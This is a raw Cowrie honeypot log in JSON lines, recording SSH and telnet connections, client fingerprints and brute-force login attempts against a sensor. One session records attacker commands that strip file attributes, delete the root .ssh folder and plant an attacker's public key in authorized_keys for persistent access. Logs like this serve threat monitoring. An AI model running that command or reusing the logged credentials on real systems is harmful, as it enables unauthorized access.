{"eventid":"cowrie.session.connect","src_ip":"212.16.68.6","src_port":57156,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0fe6f990617","protocol":"ssh","message":"New connection: 212.16.68.6:57156 (1.2.3.4:22) [session: e0fe6f990617]","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.835015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.835822Z","src_ip":"212.16.68.6","session":"e0fe6f990617"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:03.914330Z","src_ip":"212.16.68.6","session":"e0fe6f990617"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:09:04.268099Z","src_ip":"212.16.68.6","session":"e0fe6f990617"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:05.348567Z","src_ip":"212.16.68.6","session":"e0fe6f990617"}
{"eventid":"cowrie.session.connect","src_ip":"212.16.68.6","src_port":57168,"dst_ip":"1.2.3.4","dst_port":22,"session":"b299f6835e1d","protocol":"ssh","message":"New connection: 212.16.68.6:57168 (1.2.3.4:22) [session: b299f6835e1d]","sensor":"my-vps","timestamp":"2025-09-09T04:09:05.443094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:05.443964Z","src_ip":"212.16.68.6","session":"b299f6835e1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:05.531026Z","src_ip":"212.16.68.6","session":"b299f6835e1d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:09:05.921604Z","src_ip":"212.16.68.6","session":"b299f6835e1d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:06.002825Z","src_ip":"212.16.68.6","session":"f46cf705f85d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:06.011469Z","src_ip":"212.16.68.6","session":"b299f6835e1d"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50496,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e322a2c3727","protocol":"ssh","message":"New connection: 51.81.118.153:50496 (1.2.3.4:22) [session: 4e322a2c3727]","sensor":"my-vps","timestamp":"2025-09-09T04:09:12.173453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:12.174210Z","src_ip":"51.81.118.153","session":"4e322a2c3727"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:12.268654Z","src_ip":"51.81.118.153","session":"4e322a2c3727"}
{"eventid":"cowrie.login.failed","username":"service","password":"12345","message":"login attempt [service/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T04:09:12.691272Z","src_ip":"51.81.118.153","session":"4e322a2c3727"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:13.790963Z","src_ip":"51.81.118.153","session":"4e322a2c3727"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":51434,"dst_ip":"1.2.3.4","dst_port":22,"session":"311911d5c1b4","protocol":"ssh","message":"New connection: 154.209.4.55:51434 (1.2.3.4:22) [session: 311911d5c1b4]","sensor":"my-vps","timestamp":"2025-09-09T04:09:20.941417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:20.946853Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:21.147103Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2020","message":"login attempt [root/Root@2020] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:09:21.940552Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:09:22.389806Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:09:22.390458Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:09:22.391555Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:22.591895Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:09:23.011801Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.012483Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.220664Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.221603Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":52013,"dst_ip":"1.2.3.4","dst_port":22,"session":"944f8cccffff","protocol":"ssh","message":"New connection: 154.209.4.55:52013 (1.2.3.4:22) [session: 944f8cccffff]","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.421194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.428735Z","src_ip":"154.209.4.55","session":"944f8cccffff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:23.629360Z","src_ip":"154.209.4.55","session":"944f8cccffff"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:09:24.457006Z","src_ip":"154.209.4.55","session":"944f8cccffff"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:25.661343Z","src_ip":"154.209.4.55","session":"944f8cccffff"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":52469,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3b897f463d","protocol":"ssh","message":"New connection: 154.209.4.55:52469 (1.2.3.4:22) [session: 6f3b897f463d]","sensor":"my-vps","timestamp":"2025-09-09T04:09:25.853129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:25.853989Z","src_ip":"154.209.4.55","session":"6f3b897f463d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:26.056965Z","src_ip":"154.209.4.55","session":"6f3b897f463d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:09:26.882636Z","src_ip":"154.209.4.55","session":"6f3b897f463d"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:27.077261Z","src_ip":"154.209.4.55","session":"311911d5c1b4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:27.078130Z","src_ip":"154.209.4.55","session":"6f3b897f463d"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":52162,"dst_ip":"1.2.3.4","dst_port":22,"session":"e13e652d0d0f","protocol":"ssh","message":"New connection: 192.210.135.20:52162 (1.2.3.4:22) [session: e13e652d0d0f]","sensor":"my-vps","timestamp":"2025-09-09T04:09:54.626524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:54.627977Z","src_ip":"192.210.135.20","session":"e13e652d0d0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:54.737574Z","src_ip":"192.210.135.20","session":"e13e652d0d0f"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"ftp2","message":"login attempt [ftp2/ftp2] failed","sensor":"my-vps","timestamp":"2025-09-09T04:09:55.215969Z","src_ip":"192.210.135.20","session":"e13e652d0d0f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:56.328536Z","src_ip":"192.210.135.20","session":"e13e652d0d0f"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":58174,"dst_ip":"1.2.3.4","dst_port":22,"session":"94e395ca99c0","protocol":"ssh","message":"New connection: 103.59.95.12:58174 (1.2.3.4:22) [session: 94e395ca99c0]","sensor":"my-vps","timestamp":"2025-09-09T04:09:56.832263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:09:56.833251Z","src_ip":"103.59.95.12","session":"94e395ca99c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:09:57.103350Z","src_ip":"103.59.95.12","session":"94e395ca99c0"}
{"eventid":"cowrie.login.failed","username":"config","password":"1234","message":"login attempt [config/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:09:58.225886Z","src_ip":"103.59.95.12","session":"94e395ca99c0"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:09:59.498079Z","src_ip":"103.59.95.12","session":"94e395ca99c0"}
{"eventid":"cowrie.session.connect","src_ip":"101.51.128.71","src_port":38996,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e37d539c96b","protocol":"telnet","message":"New connection: 101.51.128.71:38996 (1.2.3.4:23) [session: 7e37d539c96b]","sensor":"my-vps","timestamp":"2025-09-09T04:10:00.135218Z"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":55372,"dst_ip":"1.2.3.4","dst_port":22,"session":"87d611c123f5","protocol":"ssh","message":"New connection: 152.32.190.168:55372 (1.2.3.4:22) [session: 87d611c123f5]","sensor":"my-vps","timestamp":"2025-09-09T04:10:01.336391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:01.337412Z","src_ip":"152.32.190.168","session":"87d611c123f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH 